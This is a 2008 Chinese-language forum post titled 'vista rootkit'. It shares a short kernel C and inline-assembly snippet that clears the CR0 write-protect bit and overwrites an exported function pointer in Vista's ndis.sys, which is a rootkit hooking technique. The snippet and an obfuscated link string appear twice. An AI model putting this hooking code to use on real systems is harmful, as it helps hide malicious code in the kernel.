-
-
[讨论]vista rootkit
-
发表于: 2008-9-13 18:04 4624
-
我已经很轻意地突破了Rootkit环境,我想在vista的ndis.sys文件中挂接一些函数的导出地址.我用了一个很滥的技术便实现了—利用系统分页得到写权限以下是代码:
编译执行后系统什么错误提示都没有.
原作者地址: ec4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2J5L8$3!0@1K9$3W2@1i4K6u0W2j5$3!0E0i4K6u0r3j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6V1K9i4y4H3i4K6y4p5x3e0t1K6y4K6q4Q4x3U0k6V1K9h3c8Q4x3@1c8W2k6r3N6W2x3q4)9J5y4X3y4D9L8%4y4W2k6q4)9K6c8o6u0Q4x3U0k6@1K9s2u0W2j5h3c8Q4x3@1b7I4x3U0x3%4x3b7`.`.
old_virt_func_addr = (ULONG *) MmGetSystemAddressForMdlSafe(mdl, NormalPagePriority); //得到系统分面地址 __asm { cli push eax mov eax, cr0 mov SAVECR0, eax and eax, 0xFFFEFFFF mov cr0, eax//设置系统页面文件的写权限,cr0的第17位是页 //写权限控制. pop eax } *(ULONG *)old_virt_func_addr = new_function_addr; __asm { push eax mov eax, SAVECR0 mov cr0, eax pop eax sti }.
编译执行后系统什么错误提示都没有.
原作者地址: ec4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2J5L8$3!0@1K9$3W2@1i4K6u0W2j5$3!0E0i4K6u0r3j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6V1K9i4y4H3i4K6y4p5x3e0t1K6y4K6q4Q4x3U0k6V1K9h3c8Q4x3@1c8W2k6r3N6W2x3q4)9J5y4X3y4D9L8%4y4W2k6q4)9K6c8o6u0Q4x3U0k6@1K9s2u0W2j5h3c8Q4x3@1b7I4x3U0x3%4x3b7`.`.
赞赏
他的文章
- [讨论]vista rootkit 4625
- [讨论]看这段郁闷的代码~ 5393
- 怎样可以通过函数地址来获取函数的值信息[讨论] 6207
- 驱动程序开发环境的设置(vc6.0+ddkbild+server 2003)[分享] 10228
- 一个RcR32生成工具源码[分享] 5491
赞赏
雪币:
留言: